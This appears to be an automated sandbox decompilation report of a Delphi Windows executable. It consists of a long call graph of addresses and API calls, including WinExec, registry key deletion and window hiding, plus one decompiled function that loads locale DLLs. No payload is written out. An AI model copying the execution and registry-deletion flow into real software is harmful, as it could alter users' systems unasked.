calls 13489->13490 13491 41606a 13490->13491 13492 407d04 25 API calls 13491->13492 13493 416074 13492->13493 13494 406afc DeleteObject 13493->13494 13495 41607f 13494->13495 13496 407d04 25 API calls 13495->13496 13497 416089 13496->13497 13498 40819c DeleteObject 13497->13498 13499 416093 13498->13499 13500 407a44 7 API calls 13499->13500 13501 4160a2 13500->13501 13741 4070ac 13501->13741 13504 406780 7 API calls 13505 4160c2 13504->13505 13745 4076e0 13505->13745 13510 4070ac 28 API calls 13511 4160f2 13510->13511 13512 406780 7 API calls 13511->13512 13513 4160fe 13512->13513 13514 407b6c 7 API calls 13513->13514 13515 41610d 13514->13515 13516 407d04 25 API calls 13515->13516 13517 41611b 13516->13517 13518 405f18 2 API calls 13517->13518 13519 416125 13518->13519 13520 407d04 25 API calls 13519->13520 13521 41612f 13520->13521 13522 40819c DeleteObject 13521->13522 13523 416139 13522->13523 13755 407f74 13523->13755 13530 40766c 27 API calls 13531 416178 13530->13531 13774 408320 13531->13774 13533 416187 13534 406780 7 API calls 13533->13534 13535 416196 13534->13535 13536 407b6c 7 API calls 13535->13536 13537 4161a5 13536->13537 13538 407d04 25 API calls 13537->13538 13539 4161bf 13538->13539 13540 40819c DeleteObject 13539->13540 13541 4161c9 13540->13541 13779 406ff0 13541->13779 13543 4161d8 13544 406780 7 API calls 13543->13544 13545 4161e7 13544->13545 13546 407b6c 7 API calls 13545->13546 13547 4161f3 13546->13547 13548 4070ac 28 API calls 13547->13548 13549 416213 13548->13549 13550 406780 7 API calls 13549->13550 13551 416222 13550->13551 13552 407b6c 7 API calls 13551->13552 13553 41622e 13552->13553 13554 4070ac 28 API calls 13553->13554 13555 416244 13554->13555 13556 406780 7 API calls 13555->13556 13557 416253 13556->13557 13558 4076e0 2 API calls 13557->13558 13559 416263 13558->13559 13560 40766c 27 API calls 13559->13560 13561 416272 13560->13561 13562 4070ac 28 API calls 13561->13562 13563 416283 13562->13563 13564 406780 7 API calls 13563->13564 13565 41628f 13564->13565 13566 407b6c 7 API calls 13565->13566 13567 41629e 13566->13567 13568 407d04 25 API calls 13567->13568 13569 4162ac 13568->13569 13570 40819c DeleteObject 13569->13570 13571 4162b6 13570->13571 13572 407f74 3 API calls 13571->13572 13573 4162c2 LoadCursorA 13572->13573 13574 4075fc 6 API calls 13573->13574 13575 4162da 13574->13575 13576 4072f8 3 API calls 13575->13576 13577 4162e6 13576->13577 13578 40766c 27 API calls 13577->13578 13579 4162f5 13578->13579 13784 406430 13579->13784 13582 407a44 7 API calls 13583 416316 13582->13583 13584 407a44 7 API calls 13583->13584 13585 416325 13584->13585 13787 406400 13585->13787 13587 416337 13588 407a44 7 API calls 13587->13588 13589 416346 13588->13589 13590 407a44 7 API calls 13589->13590 13591 416355 13590->13591 13592 407a44 7 API calls 13591->13592 13593 416370 13592->13593 13790 407e20 13593->13790 13595 41637a 13596 40802c 3 API calls 13595->13596 13597 416395 13596->13597 13806 416e5c WinExec 13597->13806 13600 40695c 13601 406998 13600->13601 13602 406961 13600->13602 13601->13425 13603 406978 WaitMessage 13602->13603 13605 40698d 13602->13605 14237 407b18 13603->14237 13605->13601 14241 406910 13605->14241 13608 40374b 13607->13608 13611 4036b8 13608->13611 13612 4036f4 13611->13612 13613 4036c7 13611->13613 13612->13431 13613->13612 13615 402638 25 API calls 13613->13615 13616 404874 13613->13616 13615->13613 13617 404884 GetModuleFileNameA 13616->13617 13618 4048a0 13616->13618 13620 404ab0 GetModuleFileNameA RegOpenKeyExA 13617->13620 13618->13613 13621 404b33 13620->13621 13622 404af3 RegOpenKeyExA 13620->13622 13638 4048f8 GetModuleHandleA 13621->13638 13622->13621 13623 404b11 RegOpenKeyExA 13622->13623 13623->13621 13625 404bbc lstrcpyn GetThreadLocale GetLocaleInfoA 13623->13625 13629 404bf3 13625->13629 13630 404cd6 13625->13630 13627 404b78 RegQueryValueExA 13628 404b96 RegCloseKey 13627->13628 13628->13618 13629->13630 13632 404c03 lstrlen 13629->13632 13630->13618 13633 404c1b 13632->13633 13633->13630 13634 404c40 lstrcpyn LoadLibraryExA 13633->13634 13635 404c68 13633->13635 13634->13635 13635->13630 13636 404c72 lstrcpyn LoadLibraryExA 13635->13636 13636->13630 13637 404ca4 lstrcpyn LoadLibraryExA 13636->13637 13637->13630 13639 404960 13638->13639 13640 404920 GetProcAddress 13638->13640 13642 404993 13639->13642 13643 404a82 RegQueryValueExA 13639->13643 13655 4048e4 13639->13655 13640->13639 13641 404931 13640->13641 13641->13639 13646 404947 lstrcpyn 13641->13646 13642->13643 13644 4049a6 lstrcpyn 13642->13644 13643->13627 13643->13628 13647 4049c4 13644->13647 13646->13643 13647->13643 13648 404a6e lstrcpyn 13647->13648 13650 4048e4 CharNextA 13647->13650 13652 4049e3 lstrcpyn FindFirstFileA 13647->13652 13648->13643 13650->13647 13651 4048e4 CharNextA 13651->13642 13652->13643 13653 404a0e FindClose lstrlen 13652->13653 13653->13643 13654 404a2d lstrcpyn lstrlen 13653->13654 13654->13647 13656 4048ec 13655->13656 13657 4048f7 13656->13657 13658 4048e6 CharNextA 13656->13658 13657->13643 13657->13651 13658->13656 13660 406ebc 28 API calls 13659->13660 13661 406fc4 13660->13661 13662 40766c 27 API calls 13661->13662 13663 406fe8 13662->13663 13664 406780 13663->13664 13821 4079a8 13664->13821 13831 407e84 13669->13831 13672 4062b1 13674 4062b7 13672->13674 13675 4062ed 13672->13675 13673 40631a 13676 40759c 3 API calls 13673->13676 13834 40759c 13674->13834 13678 4062f6 13675->13678 13679 406308 13675->13679 13680 406335 13676->13680 13839 4075cc 13678->13839 13682 40759c 3 API calls 13679->13682 13683 4075cc 3 API calls 13680->13683 13684 4062eb 13682->13684 13683->13684 13685 406274 13684->13685 13686 406285 13685->13686 13687 40627e 13685->13687 13688 406292 13686->13688 13854 407de0 13686->13854 13847 407e00 13687->13847 13691 407ee0 13688->13691 13867 407ed0 13691->13867 13694 407ef7 SetWindowPos 13694->13445 13695 407f09 13695->13445 13697 4083e0 2 API calls 13696->13697 13698 407a4d 13697->13698 13700 406a10 GetSysColor 13698->13700 13708 407a6d 13698->13708 13699 407aa3 13709 4061cc 13699->13709 13703 407a62 13700->13703 13701 407a83 DeleteObject 13702 407a8b 13701->13702 13704 407a9d 13702->13704 13870 406ac8 13702->13870 13705 40802c 3 API calls 13703->13705 13707 407838 InvalidateRect 13704->13707 13705->13708 13707->13699 13708->13699 13708->13701 13708->13702 13874 408750 13709->13874 13711 4061d9 13711->13449 13713 4067f8 25 API calls 13712->13713 13714 406460 13713->13714 13714->13452 13884 408218 13715->13884 13717 4082f8 13718 40766c 27 API calls 13717->13718 13719 40831b 13718->13719 13719->13460 13721 406ac8 DeleteObject 13720->13721 13722 405f29 13721->13722 13723 406a10 GetSysColor 13722->13723 13724 405f30 13723->13724 13724->13466 13726 406b05 13725->13726 13727 406b47 13726->13727 13728 406a6c DeleteObject 13726->13728 13727->13470 13728->13727 13730 4081ac 13729->13730 13731 4081bd 13730->13731 13732 406a6c DeleteObject 13730->13732 13731->13474 13732->13731 13734 408218 28 API calls 13733->13734 13735 4083b0 13734->13735 13735->13478 13737 4076ec 5 API calls 13736->13737 13738 407b7d 13737->13738 13739 407754 7 API calls 13738->13739 13740 407b9c 13739->13740 13740->13481 13742 4070bf 13741->13742 13743 408218 28 API calls 13742->13743 13744 4070e5 13743->13744 13744->13504 13746 4076a4 2 API calls 13745->13746 13747 4076e9 13746->13747 13748 40766c 13747->13748 13749 403a00 25 API calls 13748->13749 13750 407679 13749->13750 13751 40768e 13750->13751 13752 40767e SendMessageA 13750->13752 13753 40769b 13751->13753 13754 407838 InvalidateRect 13751->13754 13752->13751 13753->13510 13754->13753 13756 40759c 3 API calls 13755->13756 13757 407fa2 LoadCursorA 13756->13757 13758 4075fc 13757->13758 13760 40760b 13758->13760 13759 407664 13767 4072f8 13759->13767 13760->13759 13761 40762c GetCursorPos 13760->13761 13887 4077d0 13761->13887 13764 4077ec 3 API calls 13765 40764c 13764->13765 13765->13759 13766 40765e SetCursor 13765->13766 13766->13759 13768 4078e4 IsWindowEnabled 13767->13768 13770 407304 13768->13770 13769 407329 13769->13530 13770->13769 13771 407323 13770->13771 13772 40731c EnableWindow 13770->13772 13773 407838 InvalidateRect 13771->13773 13772->13771 13773->13769 13775 408218 28 API calls 13774->13775 13776 408338 13775->13776 13777 40766c 27 API calls 13776->13777 13778 408385 13777->13778 13778->13533 13780 408218 28 API calls 13779->13780 13781 407009 13780->13781 13782 40766c 27 API calls 13781->13782 13783 407032 13782->13783 13783->13543 13785 408750 25 API calls 13784->13785 13786 40643d 13785->13786 13786->13582 13788 408750 25 API calls 13787->13788 13789 40640d 13788->13789 13789->13587 13791 407e27 13790->13791 13792 407e2d GetSystemMetrics GetSystemMetrics 13790->13792 13791->13792 13793 407e43 13791->13793 13794 407e4e 13792->13794 13795 4077ec 3 API calls 13793->13795 13796 4083e0 2 API calls 13794->13796 13795->13794 13797 407e55 13796->13797 13798 4079f0 5 API calls 13797->13798 13799 407e5c 13798->13799 13800 4079a8 7 API calls 13799->13800 13801 407e6c 13800->13801 13802 407a18 5 API calls 13801->13802 13803 407e73 13802->13803 13804 4079cc 7 API calls 13803->13804 13805 407e80 13804->13805 13805->13595 13890 416be8 13806->13890 13812 416e8f SystemParametersInfoA FindWindowA ShowWindow 13932 402800 QueryPerformanceCounter 13812->13932 13814 416eb5 13935 4086d8 13814->13935 13817 40766c 27 API calls 13818 416ed7 13817->13818 13819 4039ac 11 API calls 13818->13819 13820 41639e 13819->13820 13820->13600 13822 407744 5 API calls 13821->13822 13823 4079af 13822->13823 13824 407754 7 API calls 13823->13824 13825 40678d 13824->13825 13826 4079cc 13825->13826 13827 407744 5 API calls 13826->13827 13828 4079d4 13827->13828 13829 407754 7 API calls 13828->13829 13830 406796 13829->13830 13830->13438 13844 407f18 13831->13844 13835 4075a1 13834->13835 13836 4075c8 13834->13836 13835->13836 13837 4075a9 SetWindowLongA SetWindowPos 13835->13837 13836->13684 13838 407838 InvalidateRect 13837->13838 13838->13836 13840 4075d1 13839->13840 13841 4075f8 13839->13841 13840->13841 13842 4075d9 SetWindowLongA SetWindowPos 13840->13842 13841->13684 13843 407838 InvalidateRect 13842->13843 13843->13841 13845 4062a5 13844->13845 13846 407f1d GetWindowLongA GetWindowLongA GetClassLongA 13844->13846 13845->13672 13845->13673 13845->13684 13846->13845 13861 407dcc 13847->13861 13850 4079f0 5 API calls 13851 407e11 13850->13851 13852 4079fc 7 API calls 13851->13852 13853 407e1d 13852->13853 13853->13686 13864 407db8 13854->13864 13857 407a18 5 API calls 13858 407df1 13857->13858 13859 407a24 7 API calls 13858->13859 13860 407dfd 13859->13860 13860->13688 13862 4077ec 3 API calls 13861->13862 13863 407dd6 13862->13863 13863->13850 13865 4077ec 3 API calls 13864->13865 13866 407dc2 13865->13866 13866->13857 13868 407f18 3 API calls 13867->13868 13869 407ed5 13868->13869 13869->13694 13869->13695 13871 406ad0 13870->13871 13872 406ad7 13870->13872 13873 406a6c DeleteObject 13871->13873 13872->13704 13873->13872 13875 40875c 13874->13875 13879 408786 13874->13879 13876 402638 25 API calls 13875->13876 13877 408766 13876->13877 13880 406854 13877->13880 13879->13711 13881 406860 13880->13881 13883 406865 13880->13883 13882 405d04 25 API calls 13881->13882 13882->13883 13883->13879 13885 406ebc 28 API calls 13884->13885 13886 40822a 13885->13886 13886->13717 13888 407640 13887->13888 13889 4077de ScreenToClient 13887->13889 13888->13764 13889->13888 13949 4150ec 13890->13949 13892 416c0f 13953 41518c 13892->13953 13898 416c35 13983 41566c 13898->13983 13902 416c5d 13994 4039d0 13902->13994 13905 416cd4 13906 4150ec 14 API calls 13905->13906 13907 416cfb 13906->13907 13908 41518c 14 API calls 13907->13908 13909 416d09 13908->13909 13910 4152d0 29 API calls 13909->13910 13911 416d17 13910->13911 13912 406040 27 API calls 13911->13912 13913 416d21 13912->13913 13914 41566c 57 API calls 13913->13914 13915 416d42 13914->13915 13916 41515c 13 API calls 13915->13916 13917 416d49 13916->13917 13918 4039d0 11 API calls 13917->13918 13919 416d6a 13918->13919 13920 416af0 13919->13920 13921 4150ec 14 API calls 13920->13921 13922 416b05 13921->13922 13923 41518c 14 API calls 13922->13923 13924 416b23 13923->13924 13925 4152d0 29 API calls 13924->13925 13926 416b32 13925->13926 13927 416b54 13926->13927 13928 416b36 13926->13928 13930 415d0c 72 API calls 13927->13930 14093 415d0c 13928->14093 13931 416b4a 13930->13931 13931->13812 13933 402818 GetTickCount 13932->13933 13934 40280d 13932->13934 13933->13814 13934->13814 13936 4086db 13935->13936 14229 407f54 13936->14229 13941 40802c 3 API calls 13942 408707 13941->13942 13943 40872e 13942->13943 13945 402638 25 API calls 13942->13945 13944 408746 13943->13944 13946 402658 11 API calls 13943->13946 13944->13817 13947 408714 13945->13947 13946->13944 13947->13943 13948 40802c 3 API calls 13947->13948 13948->13943 13950 4150f2 13949->13950 13951 41518c 14 API calls 13950->13951 13952 41510a 13951->13952 13952->13892 13954 4151b3 13953->13954 13955 415199 13953->13955 13959 4152d0 13954->13959 13956 4151a9 13955->13956 13957 41519f RegCloseKey 13955->13957 13958 41515c 13 API calls 13956->13958 13957->13956 13958->13954 13960 403a44 11 API calls 13959->13960 13961 4152fc 13960->13961 13962 41531c 13961->13962 13998 403ed8 13961->13998 13964 41532d 13962->13964 13965 415357 13962->13965 13966 415349 RegOpenKeyExA 13964->13966 13968 41537d RegCreateKeyExA 13965->13968 13967 415389 13966->13967 13969 4153bf 13967->13969 13970 4153b2 13967->13970 14003 403d08 13967->14003 13968->13967 13972 4039ac 11 API calls 13969->13972 14012 4151b8 13970->14012 13974 4153d4 13972->13974 13975 406040 13974->13975 13976 406047 GetModuleFileNameA 13975->13976 13977 40606e GetCommandLineA 13975->13977 14023 403a9c 13976->14023 13980 406076 13977->13980 13981 403a9c 25 API calls 13980->13981 13982 4060a3 13981->13982 13982->13898 13984 41567c 13983->13984 14028 415698 13984->14028 13986 415692 13987 41515c 13986->13987 13988 415187 13987->13988 13989 415166 13987->13989 13988->13902 13990 415174 RegFlushKey 13989->13990 13991 41516c RegCloseKey 13989->13991 13992 41517a 13990->13992 13991->13992 13993 4039ac 11 API calls 13992->13993 13993->13988 13996 4039d6 13994->13996 13995 4039fc 13995->13905 13996->13995 13997 402658 11 API calls 13996->13997 13997->13996 14017 403e88 13998->14017 14000 403f1c 14000->13962 14001 403ee6 14001->14000 14002 403f68 25 API calls 14001->14002 14002->14000 14004 403d19 14003->14004 14005 403d56 14004->14005 14006 403d3f 14004->14006 14008 403a70 25 API calls 14005->14008 14007 403f68 25 API calls 14006->14007 14009 403d4c 14007->14009 14008->14009 14010 403d87 14009->14010 14011 403a00 25 API calls 14009->14011 14011->14010 14013 41515c 13 API calls 14012->14013 14014 4151c8 14013->14014 14015 403a00 25 API calls 14014->14015 14016 4151d5 14015->14016 14016->13969 14018 403e44 14017->14018 14019 403a70 25 API calls 14018->14019 14021 403e7f 14018->14021 14020 403e5b 14019->14020 14020->14021 14022 402658 11 API calls 14020->14022 14021->14001 14022->14021 14024 403a70 25 API calls 14023->14024 14025 403aac 14024->14025 14026 4039ac 11 API calls 14025->14026 14027 403ac4 14026->14027 14027->13898 14029 4156b0 14028->14029 14030 4156c4 RegSetValueExA 14029->14030 14031 4156d2 14030->14031 14032 4156f1 14030->14032 14034 40cdd0 14031->14034 14032->13986 14035 40cdde 14034->14035 14044 405314 14035->14044 14037 40ce08 14050 40a458 14037->14050 14040 403a00 25 API calls 14041 40ce21 14040->14041 14042 4039d0 11 API calls 14041->14042 14043 40ce3b 14042->14043 14043->14032 14045 405324 14044->14045 14046 405355 14044->14046 14045->14046 14053 4048bc 14045->14053 14046->14037 14048 405344 LoadStringA 14049 403a9c 25 API calls 14048->14049 14049->14046 14058 40a46c 14050->14058 14054 4048e3 14053->14054 14055 4048c6 14053->14055 14054->14048 14055->14054 14056 404874 30 API calls 14055->14056 14057 4048dc 14056->14057 14057->14048 14059 40a490 14058->14059 14061 40a4bb 14059->14061 14071 40a0a0 14059->14071 14062 40a513 14061->14062 14069 40a4d0 14061->14069 14063 403a9c 25 API calls 14062->14063 14065 40a467 14063->14065 14064 40a509 14066 403f68 25 API calls 14064->14066 14065->14040 14066->14065 14067 4039ac 11 API calls 14067->14069 14068 403f68 25 API calls 14068->14069 14069->14064 14069->14067 14069->14068 14070 40a0a0 56 API calls 14069->14070 14070->14069 14077 40a0c9 14071->14077 14072 40a0da 14090 40a3f7 14072->14090 14075 40a182 11 API calls 14075->14077 14077->14072 14077->14075 14079 40a1ca 14077->14079 14087 40a094 14077->14087 14080 40a1db 14079->14080 14084 40a235 14079->14084 14082 40a2d3 14080->14082 14080->14084 14081 40a3f7 11 API calls 14081->14084 14085 40a070 11 API calls 14082->14085 14086 409908 14082->14086 14083 40a018 56 API calls 14083->14084 14084->14081 14084->14083 14084->14086 14085->14086 14086->14077 14088 4039ac 11 API calls 14087->14088 14089 40a09e 14088->14089 14089->14077 14091 4039ac 11 API calls 14090->14091 14092 40a404 14091->14092 14092->14061 14115 41580c 14093->14115 14096 415df5 14096->13931 14097 41580c 27 API calls 14098 415d37 14097->14098 14098->14096 14120 415774 14098->14120 14103 415774 26 API calls 14104 415d78 14103->14104 14105 415d81 14104->14105 14106 415dd7 RegCloseKey 14104->14106 14141 415998 14105->14141 14106->13931 14109 415d9b 14152 415ac0 14109->14152 14111 415db9 RegCloseKey 14111->13931 14112 415da8 14112->14111 14171 4153f4 14112->14171 14116 415774 26 API calls 14115->14116 14117 41583f 14116->14117 14118 415845 RegCloseKey 14117->14118 14119 41584b 14117->14119 14118->14119 14119->14096 14119->14097 14121 403a44 11 API calls 14120->14121 14122 41579d 14121->14122 14123 403ed8 25 API calls 14122->14123 14124 4157bd 14122->14124 14123->14124 14125 4157de RegOpenKeyExA 14124->14125 14126 4157f1 14125->14126 14127 4039ac 11 API calls 14126->14127 14128 4157f9 14127->14128 14128->14096 14129 4151f4 14128->14129 14130 403a44 11 API calls 14129->14130 14131 415223 14130->14131 14132 403ed8 25 API calls 14131->14132 14133 415243 14131->14133 14132->14133 14134 41526a RegCreateKeyExA 14133->14134 14135 415286 14134->14135 14136 41527b RegCloseKey 14134->14136 14138 40cdd0 56 API calls 14135->14138 14137 4152a5 14136->14137 14139 4039ac 11 API calls 14137->14139 14138->14137 14140 4152bf 14139->14140 14140->14103 14142 4159d5 14141->14142 14194 41558c 14142->14194 14146 415a6e 14146->14109 14147 415a05 14148 403a9c 25 API calls 14147->14148 14150 415a14 14148->14150 14149 415a3a RegEnumValueA 14149->14150 14150->14146 14150->14149 14151 415878 59 API calls 14150->14151 14151->14150 14153 415b02 14152->14153 14154 41558c RegQueryInfoKeyA 14153->14154 14155 415b1e 14154->14155 14156 403a9c 25 API calls 14155->14156 14157 415cbb 14155->14157 14159 415b34 14156->14159 14157->14112 14158 415b66 RegEnumKeyExA 14158->14159 14159->14157 14159->14158 14160 415774 26 API calls 14159->14160 14161 415ba9 14159->14161 14160->14159 14162 4151f4 58 API calls 14161->14162 14163 415bff 14162->14163 14164 415774 26 API calls 14163->14164 14165 415c1f 14164->14165 14166 415998 61 API calls 14165->14166 14167 415c3f 14166->14167 14168 415ac0 64 API calls 14167->14168 14169 415c4f RegCloseKey 14168->14169 14169->14112 14172 403a44 11 API calls 14171->14172 14173 415423 14171->14173 14172->14173 14174 415446 14173->14174 14176 403ed8 25 API calls 14173->14176 14175 415774 26 API calls 14174->14175 14177 415459 14175->14177 14176->14174 14178 415466 14177->14178 14179 41551b 14177->14179 14180 41558c RegQueryInfoKeyA 14178->14180 14182 41552f RegDeleteKeyA 14179->14182 14181 41548a 14180->14181 14183 4154f2 14181->14183 14185 403a9c 25 API calls 14181->14185 14184 415547 14182->14184 14189 41550a RegCloseKey 14183->14189 14186 4039ac 11 API calls 14184->14186 14192 41549c 14185->14192 14187 41554f 14186->14187 14188 4039d0 11 API calls 14187->14188 14190 41555c 14188->14190 14189->14111 14190->14111 14191 4154c0 RegEnumKeyExA 14191->14192 14192->14183 14192->14191 14193 4153f4 27 API calls 14192->14193 14193->14192 14209 4028f0 14194->14209 14197 4155d9 14197->14146 14198 415878 14197->14198 14199 41589d 14198->14199 14211 415644 14199->14211 14203 4158c9 14217 415700 14203->14217 14204 41596e 14204->14147 14206 4158ef 14207 415698 57 API calls 14206->14207 14208 41592e 14207->14208 14208->14147 14210 402904 RegQueryInfoKeyA 14209->14210 14210->14197 14223 4155f4 14211->14223 14213 415658 14213->14204 14214 409720 14213->14214 14215 402638 25 API calls 14214->14215 14216 40972b 14215->14216 14216->14203 14227 403e38 14217->14227 14220 415734 14222 40cdd0 56 API calls 14220->14222 14221 415753 14221->14206 14222->14221 14224 41560d 14223->14224 14225 415621 RegQueryValueExA 14224->14225 14226 415638 14225->14226 14226->14213 14228 403e3c RegQueryValueExA 14227->14228 14228->14220 14228->14221 14230 407f44 14229->14230 14231 407f50 14230->14231 14232 40802c 3 API calls 14230->14232 14233 407f64 14231->14233 14232->14231 14234 407f44 14233->14234 14235 407f50 14234->14235 14236 40802c 3 API calls 14234->14236 14235->13941 14235->13943 14236->14235 14247 407ac4 PeekMessageA 14237->14247 14240 407b23 14240->13602 14242 406927 14241->14242 14245 406947 14241->14245 14243 407b18 3 API calls 14242->14243 14242->14245 14244 40693b 14243->14244 14246 40802c 3 API calls 14244->14246 14245->13601 14246->14245 14248 407adc 14247->14248 14249 407ae4 14247->14249 14248->14249 14250 407afb TranslateMessage DispatchMessageA 14248->14250 14249->14237 14249->14240 14250->14249 14251 406a8e 14252 406aa4 14251->14252 14253 406a97 14251->14253 14255 406aa9 DeleteObject 14252->14255 14256 406aaf 14252->14256 14253->14252 14254 406a9c DeleteObject 14253->14254 14254->14252 14255->14256 14257 406818 11 API calls 14256->14257 14258 406ab5 14257->14258

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  C-Code - Quality: 65%
                                                                                                                                                  			E00404AB0(intOrPtr __eax) {
                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                  				void* _v12;
                                                                                                                                                  				char _v15;
                                                                                                                                                  				char _v17;
                                                                                                                                                  				char _v18;
                                                                                                                                                  				char _v22;
                                                                                                                                                  				int _v28;
                                                                                                                                                  				char _v289;
                                                                                                                                                  				long _t44;
                                                                                                                                                  				long _t61;
                                                                                                                                                  				long _t63;
                                                                                                                                                  				CHAR* _t70;
                                                                                                                                                  				CHAR* _t72;
                                                                                                                                                  				struct HINSTANCE__* _t78;
                                                                                                                                                  				struct HINSTANCE__* _t84;
                                                                                                                                                  				char* _t94;
                                                                                                                                                  				void* _t95;
                                                                                                                                                  				intOrPtr _t99;
                                                                                                                                                  				struct HINSTANCE__* _t107;
                                                                                                                                                  				void* _t110;
                                                                                                                                                  				void* _t112;
                                                                                                                                                  				intOrPtr _t113;
                                                                                                                                                  
                                                                                                                                                  				_t110 = _t112;
                                                                                                                                                  				_t113 = _t112 + 0xfffffee0;
                                                                                                                                                  				_v8 = __eax;
                                                                                                                                                  				GetModuleFileNameA(0,  &_v289, 0x105);
                                                                                                                                                  				_v22 = 0;
                                                                                                                                                  				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
                                                                                                                                                  				if(_t44 == 0) {
                                                                                                                                                  					L3:
                                                                                                                                                  					_push(_t110);
                                                                                                                                                  					_push(0x404bb5);
                                                                                                                                                  					_push( *[fs:eax]);
                                                                                                                                                  					 *[fs:eax] = _t113;
                                                                                                                                                  					_v28 = 5;
                                                                                                                                                  					E004048F8( &_v289, 0x105);
                                                                                                                                                  					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, 0x404d1c, 0, 0,  &_v22,  &_v28) != 0) {
                                                                                                                                                  						_v22 = 0;
                                                                                                                                                  					}
                                                                                                                                                  					_v18 = 0;
                                                                                                                                                  					_pop(_t99);
                                                                                                                                                  					 *[fs:eax] = _t99;
                                                                                                                                                  					_push(0x404bbc);
                                                                                                                                                  					return RegCloseKey(_v12);
                                                                                                                                                  				} else {
                                                                                                                                                  					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
                                                                                                                                                  					if(_t61 == 0) {
                                                                                                                                                  						goto L3;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
                                                                                                                                                  						if(_t63 != 0) {
                                                                                                                                                  							_push(0x105);
                                                                                                                                                  							_push(_v8);
                                                                                                                                                  							_push( &_v289);
                                                                                                                                                  							L00401200();
                                                                                                                                                  							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
                                                                                                                                                  							_t107 = 0;
                                                                                                                                                  							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
                                                                                                                                                  								_t70 =  &_v289;
                                                                                                                                                  								_push(_t70);
                                                                                                                                                  								L00401208();
                                                                                                                                                  								_t94 = _t70 +  &_v289;
                                                                                                                                                  								while( *_t94 != 0x2e && _t94 !=  &_v289) {
                                                                                                                                                  									_t94 = _t94 - 1;
                                                                                                                                                  								}
                                                                                                                                                  								_t72 =  &_v289;
                                                                                                                                                  								if(_t94 != _t72) {
                                                                                                                                                  									_t95 = _t94 + 1;
                                                                                                                                                  									if(_v22 != 0) {
                                                                                                                                                  										_push(0x105 - _t95 - _t72);
                                                                                                                                                  										_push( &_v22);
                                                                                                                                                  										_push(_t95);
                                                                                                                                                  										L00401200();
                                                                                                                                                  										_t107 = LoadLibraryExA( &_v289, 0, 2);
                                                                                                                                                  									}
                                                                                                                                                  									if(_t107 == 0 && _v17 != 0) {
                                                                                                                                                  										_push(0x105 - _t95 -  &_v289);
                                                                                                                                                  										_push( &_v17);
                                                                                                                                                  										_push(_t95);
                                                                                                                                                  										L00401200();
                                                                                                                                                  										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
                                                                                                                                                  										_t107 = _t78;
                                                                                                                                                  										if(_t107 == 0) {
                                                                                                                                                  											_v15 = 0;
                                                                                                                                                  											_push(0x105 - _t95 -  &_v289);
                                                                                                                                                  											_push( &_v17);
                                                                                                                                                  											_push(_t95);
                                                                                                                                                  											L00401200();
                                                                                                                                                  											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
                                                                                                                                                  											_t107 = _t84;
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  							return _t107;
                                                                                                                                                  						} else {
                                                                                                                                                  							goto L3;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  			}

























                                                                                                                                                  0x00404ab1
                                                                                                                                                  0x00404ab3
                                                                                                                                                  0x00404abb
                                                                                                                                                  0x00404acc
                                                                                                                                                  0x00404ad1
                                                                                                                                                  0x00404aea
                                                                                                                                                  0x00404af1
                                                                                                                                                  0x00404b33
                                                                                                                                                  0x00404b35
                                                                                                                                                  0x00404b36
                                                                                                                                                  0x00404b3b
                                                                                                                                                  0x00404b3e
                                                                                                                                                  0x00404b41
                                                                                                                                                  0x00404b53
                                                                                                                                                  0x00404b76
                                                                                                                                                  0x00404b96
                                                                                                                                                  0x00404b96
                                                                                                                                                  0x00404b9a
                                                                                                                                                  0x00404ba0
                                                                                                                                                  0x00404ba3
                                                                                                                                                  0x00404ba6
                                                                                                                                                  0x00404bb4
                                                                                                                                                  0x00404af3
                                                                                                                                                  0x00404b08
                                                                                                                                                  0x00404b0f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404b11
                                                                                                                                                  0x00404b26
                                                                                                                                                  0x00404b2d
                                                                                                                                                  0x00404bbc
                                                                                                                                                  0x00404bc4
                                                                                                                                                  0x00404bcb
                                                                                                                                                  0x00404bcc
                                                                                                                                                  0x00404bdf
                                                                                                                                                  0x00404be4
                                                                                                                                                  0x00404bed
                                                                                                                                                  0x00404c03
                                                                                                                                                  0x00404c09
                                                                                                                                                  0x00404c0a
                                                                                                                                                  0x00404c17
                                                                                                                                                  0x00404c1c
                                                                                                                                                  0x00404c1b
                                                                                                                                                  0x00404c1b
                                                                                                                                                  0x00404c2b
                                                                                                                                                  0x00404c33
                                                                                                                                                  0x00404c39
                                                                                                                                                  0x00404c3e
                                                                                                                                                  0x00404c4b
                                                                                                                                                  0x00404c4f
                                                                                                                                                  0x00404c50
                                                                                                                                                  0x00404c51
                                                                                                                                                  0x00404c66
                                                                                                                                                  0x00404c66
                                                                                                                                                  0x00404c6a
                                                                                                                                                  0x00404c83
                                                                                                                                                  0x00404c87
                                                                                                                                                  0x00404c88
                                                                                                                                                  0x00404c89
                                                                                                                                                  0x00404c99
                                                                                                                                                  0x00404c9e
                                                                                                                                                  0x00404ca2
                                                                                                                                                  0x00404ca4
                                                                                                                                                  0x00404cb9
                                                                                                                                                  0x00404cbd
                                                                                                                                                  0x00404cbe
                                                                                                                                                  0x00404cbf
                                                                                                                                                  0x00404ccf
                                                                                                                                                  0x00404cd4
                                                                                                                                                  0x00404cd4
                                                                                                                                                  0x00404ca2
                                                                                                                                                  0x00404c6a
                                                                                                                                                  0x00404c33
                                                                                                                                                  0x00404cdd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404b2d
                                                                                                                                                  0x00404b0f

                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 00404ACC
